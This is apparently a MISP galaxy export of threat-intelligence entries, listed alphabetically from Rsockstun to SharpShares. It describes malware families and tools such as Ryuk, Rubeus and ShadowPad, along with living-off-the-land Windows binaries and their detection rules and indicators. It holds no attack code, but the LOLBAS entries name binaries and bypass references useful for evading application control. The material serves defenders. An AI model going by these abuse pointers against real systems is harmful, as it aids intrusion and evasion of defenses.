Rsockstun is an open-source software project. According to its GitHub repository, Rsockstun is a reverse socks5 tunneler with SSL, ntlm, and proxy support.[GitHub rsockstun]
Internal MISP references
UUID c3b9281b-5f18-4119-903e-c27f1a4004b4
which can be used as unique global reference for Rsockstun
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5076 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
RTM
RTM is custom malware written in Delphi. It is used by the group of the same name (RTM). Newer versions of the malware have been reported publicly as Redaman.[ESET RTM Feb 2017][Unit42 Redaman January 2019]
Internal MISP references
UUID 1836485e-a3a6-4fae-a15d-d0990788811a
which can be used as unique global reference for RTM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0148 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rubeus
Rubeus is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.[GitHub Rubeus March 2023][FireEye KEGTAP SINGLEMALT October 2020][DFIR Ryuk's Return October 2020][DFIR Ryuk 2 Hour Speed Run November 2020]
Internal MISP references
UUID 2e54f40c-ab62-535e-bbab-3f3a835ff55a
which can be used as unique global reference for Rubeus
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1071 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Ruler
Ruler is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of Ruler have also released a defensive tool, NotRuler, to detect its usage.[SensePost Ruler GitHub][SensePost NotRuler]
Internal MISP references
UUID 69563cbd-7dc1-4396-b576-d5886df11046
which can be used as unique global reference for Ruler
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Office 365', 'Windows'] |
software_attack_id | S0358 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Rundll32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to execute dll files
Author: Oddvar Moe
Paths: * C:\Windows\System32\rundll32.exe * C:\Windows\SysWOW64\rundll32.exe
Resources: * https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ * https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/ * https://github.com/sailay1996/expl-bin/blob/master/obfus.md * https://github.com/sailay1996/misc-bin/blob/master/rundll32.md * https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90 * https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
Detection: * Sigma: net_connection_win_rundll32_net_connections.yml * Sigma: proc_creation_win_rundll32_susp_activity.yml * Elastic: defense_evasion_unusual_network_connection_via_rundll32.toml * IOC: Outbount Internet/network connections made from rundll32 * IOC: Suspicious use of cmdline flags such as -sta[Rundll32.exe - LOLBAS Project]
Internal MISP references
UUID cd5a27c8-9611-41d9-b839-b0ba7daf58b5
which can be used as unique global reference for Rundll32
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5156 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'd28b269e-588d-49ed-b5c9-8e82077924c0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Runexehelper
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Launcher process
Author: Grzegorz Tworek
Paths: * c:\windows\system32\runexehelper.exe
Resources: * https://twitter.com/0gtweet/status/1206692239839289344
Detection: * Sigma: proc_creation_win_lolbin_runexehelper.yml * IOC: c:\windows\system32\runexehelper.exe is run * IOC: Existence of runexewithargs_output.txt file[Runexehelper.exe - LOLBAS Project]
Internal MISP references
UUID db516b7d-e5bd-4da8-a708-2fe5d2a2fdfd
which can be used as unique global reference for Runexehelper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5157 |
source | Tidal Cyber |
tags | ['270a347d-d2e1-4d46-9b32-37e8d7264301', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
RunningRAT
RunningRAT is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with Gold Dragon and Brave Prince. [McAfee Gold Dragon]
Internal MISP references
UUID e8afda1f-fa83-4fc3-b6fb-7d5daca7173f
which can be used as unique global reference for RunningRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0253 |
source | MITRE |
type | ['malware'] |
Runonce
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Executes a Run Once Task that has been configured in the registry
Author: Oddvar Moe
Paths: * C:\Windows\System32\runonce.exe * C:\Windows\SysWOW64\runonce.exe
Resources: * https://twitter.com/pabraeken/status/990717080805789697 * https://cmatskas.com/configure-a-runonce-task-on-windows/
Detection: * Sigma: registry_event_runonce_persistence.yml * Sigma: proc_creation_win_runonce_execution.yml * Elastic: persistence_run_key_and_startup_broad.toml * IOC: Registy key add - HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY[Runonce.exe - LOLBAS Project]
Internal MISP references
UUID ccad36ac-b526-44ec-840a-6f498c51781c
which can be used as unique global reference for Runonce
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5158 |
source | Tidal Cyber |
tags | ['065db33d-c152-4ba9-8bf9-13616f78ae05', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Runscripthelper
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Execute target PowerShell script
Author: Oddvar Moe
Paths: * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
Resources: * https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
Detection: * Sigma: proc_creation_win_lolbin_runscripthelper.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Event 4014 - Powershell logging * IOC: Event 400[Runscripthelper.exe - LOLBAS Project]
Internal MISP references
UUID 035bae51-c1cc-46f0-8532-a5d01c4d4a52
which can be used as unique global reference for Runscripthelper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5159 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Ryuk
Ryuk is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. Ryuk shares code similarities with Hermes ransomware.[CrowdStrike Ryuk January 2019][FireEye Ryuk and Trickbot January 2019][FireEye FIN6 Apr 2019]
Internal MISP references
UUID 8ae86854-4cdc-49eb-895a-d1fa742f7974
which can be used as unique global reference for Ryuk
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0446 |
source | MITRE |
tags | ['89c5b94b-ecf4-4d53-9b74-3465086d4565', '3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '12a2e20a-7c27-46bb-954d-b372833a9925', 'c2380542-36f2-4922-9ed2-80ced06645c9', 'c8ce7130-e134-492c-a98a-ed1d25b57e4c', '2743d495-7728-4a75-9e5f-b64854039792', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Saint Bot
Saint Bot is a .NET downloader that has been used by Ember Bear since at least March 2021.[Malwarebytes Saint Bot April 2021][Palo Alto Unit 42 OutSteel SaintBot February 2022 ]
Internal MISP references
UUID d66e5d18-e9f5-4091-bdf4-acdac129e2e0
which can be used as unique global reference for Saint Bot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1018 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sakula
Sakula is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. [Dell Sakula]
Internal MISP references
UUID a316c704-144a-4d14-8e4e-685bb6ae391c
which can be used as unique global reference for Sakula
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0074 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SamSam
SamSam is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.[US-CERT SamSam 2018][Talos SamSam Jan 2018][Sophos SamSam Apr 2018][Symantec SamSam Oct 2018]
Internal MISP references
UUID 88831e9f-453e-466f-9510-9acaa1f20368
which can be used as unique global reference for SamSam
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0370 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Samurai
Samurai is a passive backdoor that has been used by ToddyCat since at least 2020. Samurai allows arbitrary C# code execution and is used with multiple modules for remote administration and lateral movement.[Kaspersky ToddyCat June 2022]
Internal MISP references
UUID bd75c822-7be6-5e6f-bd2e-0512be6d38d9
which can be used as unique global reference for Samurai
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1099 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sardonic
Sardonic is a backdoor written in C and C++ that is known to be used by FIN8, as early as August 2021 to target a financial institution in the United States. Sardonic has a plugin system that can load specially made DLLs and execute their functions.[Bitdefender Sardonic Aug 2021][Symantec FIN8 Jul 2023]
Internal MISP references
UUID 9ab0d523-3496-5e64-9ca1-bb756f5e64e0
which can be used as unique global reference for Sardonic
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1085 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to manage services
Author: Oddvar Moe
Paths: * C:\Windows\System32\sc.exe * C:\Windows\SysWOW64\sc.exe
Resources: * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
Detection: * Sigma: proc_creation_win_susp_service_creation.yml * Sigma: proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml * Sigma: proc_creation_win_sc_service_path_modification.yml * Splunk: sc_exe_manipulating_windows_services.yml * Elastic: lateral_movement_cmd_service.toml * IOC: Unexpected service creation * IOC: Unexpected service modification[Sc.exe - LOLBAS Project]
Internal MISP references
UUID 41be663f-ecc9-4ab6-afeb-c52737f84858
which can be used as unique global reference for Sc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5160 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
schtasks
schtasks is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. [TechNet Schtasks]
Internal MISP references
UUID 2aacbf3a-a359-41d2-9a71-76447f0545b5
which can be used as unique global reference for schtasks
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0111 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'f0c54030-956a-4bac-9f98-deb2349183ac', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Scriptrunner
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Execute binary through proxy binary to evade defensive counter measures
Author: Oddvar Moe
Paths: * C:\Windows\System32\scriptrunner.exe * C:\Windows\SysWOW64\scriptrunner.exe
Resources: * https://twitter.com/KyleHanslovan/status/914800377580503040 * https://twitter.com/NickTyrer/status/914234924655312896 * https://github.com/MoooKitty/Code-Execution
Detection: * Sigma: proc_creation_win_servu_susp_child_process.yml * IOC: Scriptrunner.exe should not be in use unless App-v is deployed[Scriptrunner.exe - LOLBAS Project]
Internal MISP references
UUID ba4d8522-9656-462e-b25e-32a9bba85a60
which can be used as unique global reference for Scriptrunner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5161 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Scrobj
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Script Component Runtime
Author: Eral4m
Paths: * c:\windows\system32\scrobj.dll * c:\windows\syswow64\scrobj.dll
Resources: * https://twitter.com/eral4m/status/1479106975967240209
Detection: * IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line[Scrobj.dll - LOLBAS Project]
Internal MISP references
UUID 101f7867-9c5c-482e-b26e-9fdb8ff9b2c7
which can be used as unique global reference for Scrobj
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5194 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SDBbot
SDBbot is a backdoor with installer and loader components that has been used by TA505 since at least 2019.[Proofpoint TA505 October 2019][IBM TA505 April 2020]
Internal MISP references
UUID 046bbd0c-bff5-46fc-9028-cbe46a9f8ec5
which can be used as unique global reference for SDBbot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0461 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SDelete
SDelete is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. [Microsoft SDelete July 2016]
Internal MISP references
UUID 3d4be65d-231b-44bb-8d12-5038a3d48bae
which can be used as unique global reference for SDelete
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0195 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SeaDuke
SeaDuke is malware that was used by APT29 from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with CozyCar. [F-Secure The Dukes]
Internal MISP references
UUID ae30d58e-21c5-41a4-9ebb-081dc1f26863
which can be used as unique global reference for SeaDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0053 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Seasalt
Seasalt is malware that has been linked to APT1's 2010 operations. It shares some code similarities with OceanSalt.[Mandiant APT1 Appendix][McAfee Oceansalt Oct 2018]
Internal MISP references
UUID 3527b09b-f3f6-4716-9f90-64ea7d3b9d8a
which can be used as unique global reference for Seasalt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0345 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SEASHARPEE
SEASHARPEE is a Web shell that has been used by OilRig. [FireEye APT34 Webinar Dec 2017]
Internal MISP references
UUID 42c8504c-8a18-46d2-a145-35b0cd8ba669
which can be used as unique global reference for SEASHARPEE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0185 |
source | MITRE |
tags | ['311abf64-a9cc-4c6a-b778-32c5df5658be'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Seatbelt
Seatbelt is a tool used to perform numerous security-oriented checks.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 74beac1c-8468-4f1e-8990-11a4eb7b0110
which can be used as unique global reference for Seatbelt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5042 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
secretsdump
According to joint Cybersecurity Advisory AA23-319A (November 2023), secretsdump is a Python script "used to extract credentials and other confidential information from a system".[U.S. CISA Rhysida Ransomware November 15 2023] Secretsdump is publicly available and included as a module of Impacket, a tool for working with network protocols.[GitHub secretsdump]
Internal MISP references
UUID a1fef846-cb22-4885-aa14-cb67ab38fce4
which can be used as unique global reference for secretsdump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5072 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '61b7b81d-3f98-4bed-97a9-d6c536b8969b', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
ServHelper
ServHelper is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.[Proofpoint TA505 Jan 2019]
Internal MISP references
UUID 704ed49d-103c-4b33-b85c-73670cc1d719
which can be used as unique global reference for ServHelper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0382 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Seth-Locker
Seth-Locker is a ransomware with some remote control capabilities that has been in use since at least 2021. [Trend Micro Ransomware February 2021]
Internal MISP references
UUID fb47c051-d22b-4a05-94a7-cf979419b60a
which can be used as unique global reference for Seth-Locker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0639 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Setres
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Configures display settings
Author: Grzegorz Tworek
Paths: * c:\windows\system32\setres.exe
Resources: * https://twitter.com/0gtweet/status/1583356502340870144
Detection: * Sigma: proc_creation_win_lolbin_setres.yml * IOC: Unusual location for choice.exe file * IOC: Process created from choice.com binary * IOC: Existence of choice.cmd file[Setres.exe - LOLBAS Project]
Internal MISP references
UUID ad872ead-f3be-49df-b2f3-2526246acdf5
which can be used as unique global reference for Setres
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5162 |
source | Tidal Cyber |
tags | ['d75511ab-cbff-46d3-8268-427e3cff134a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SettingSyncHost
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Host Process for Setting Synchronization
Author: Elliot Killick
Paths: * C:\Windows\System32\SettingSyncHost.exe * C:\Windows\SysWOW64\SettingSyncHost.exe
Resources: * https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/
Detection: * Sigma: proc_creation_win_lolbin_settingsynchost.yml * IOC: SettingSyncHost.exe should not be run on a normal workstation[SettingSyncHost.exe - LOLBAS Project]
Internal MISP references
UUID e46a42d6-ca6e-4237-ab66-b0d102a580c7
which can be used as unique global reference for SettingSyncHost
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5163 |
source | Tidal Cyber |
tags | ['8929bc83-9ed6-4579-b837-40236b59b383', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Setupapi
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Setup Application Programming Interface
Author: LOLBAS Team
Paths: * c:\windows\system32\setupapi.dll * c:\windows\syswow64\setupapi.dll
Resources: * https://github.com/huntresslabs/evading-autoruns * https://twitter.com/pabraeken/status/994742106852941825 * https://windows10dll.nirsoft.net/setupapi_dll.html
Detection: * Sigma: proc_creation_win_rundll32_setupapi_installhinfsection.yml * Sigma: proc_creation_win_rundll32_susp_activity.yml * Splunk: detect_rundll32_application_control_bypass___setupapi.yml[Setupapi.dll - LOLBAS Project]
Internal MISP references
UUID e7d450ec-dd29-455f-8d26-f8a563e1e88d
which can be used as unique global reference for Setupapi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5195 |
source | Tidal Cyber |
tags | ['da405033-3571-4f98-9810-53d9df1ac0fb', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ShadowPad
ShadowPad is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by APT41, but has since been observed to be used by various Chinese threat activity groups. [Recorded Future RedEcho Feb 2021][Securelist ShadowPad Aug 2017][Kaspersky ShadowPad Aug 2017]
Internal MISP references
UUID 5190f50d-7e54-410a-9961-79ab751ddbab
which can be used as unique global reference for ShadowPad
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0596 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Shamoon
Shamoon is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. Shamoon has also been seen leveraging RawDisk and Filerase to carry out data wiping tasks. Analysis has linked Shamoon with Kwampirs based on multiple shared artifacts and coding patterns.[Cylera Kwampirs 2022] The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.[Palo Alto Shamoon Nov 2016][Unit 42 Shamoon3 2018][Symantec Shamoon 2012][FireEye Shamoon Nov 2016]
Internal MISP references
UUID 840db1db-e262-4d6f-b6e3-2a64696a41c5
which can be used as unique global reference for Shamoon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0140 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Shark
Shark is a backdoor malware written in C# and .NET that is an updated version of Milan; it has been used by HEXANE since at least July 2021.[ClearSky Siamesekitten August 2021][Accenture Lyceum Targets November 2021]
Internal MISP references
UUID 278da5e8-4d4c-4c45-ad72-8f078872fb4a
which can be used as unique global reference for Shark
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1019 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SharpChromium
SharpChromium is an open-source software project. According to its GitHub repository, SharpChromium is a ".NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins."[GitHub SharpChromium]
Internal MISP references
UUID 311e8944-2157-4616-8b95-d75020e21c35
which can be used as unique global reference for SharpChromium
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5075 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SharpDisco
SharpDisco is a dropper developed in C# that has been used by MoustachedBouncer since at least 2020 to load malicious plugins.[MoustachedBouncer ESET August 2023]
Internal MISP references
UUID 4ed1e83b-a208-5518-bed2-d07c1b289da2
which can be used as unique global reference for SharpDisco
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1089 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SharpHound
SharpHound is an open-source software utility incorporated into the BloodHound Active Directory (AD) reconnaissance tool.[GitHub SharpHound] Adversaries have used SharpHound for AD enumeration.[U.S. CISA Phobos February 29 2024]
Internal MISP references
UUID 0bcf0dae-315f-491f-bc65-b1772ffa31c1
which can be used as unique global reference for SharpHound
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5275 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'cd1b5d44-226e-4405-8985-800492cf2865', 'e1af18e3-3224-4e4c-9d0f-533768474508'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SharpRoast
SharpRoast is an open-source tool used to carry out Kerberoasting attacks. According to its GitHub project page, the tool is a C# port of specific functionality included in the PowerView module of the PowerSploit offensive security framework.[GitHub SharpRoast]
Internal MISP references
UUID 54a5c881-c1ad-40d0-88c0-6c32b9ef95cb
which can be used as unique global reference for SharpRoast
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5060 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SharpShares
SharpShares is a tool that can be used to enumerate accessible network shares in a domain. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID a202b37f-5c61-410b-bb14-a3e6b2b82833
which can be used as unique global reference for SharpShares
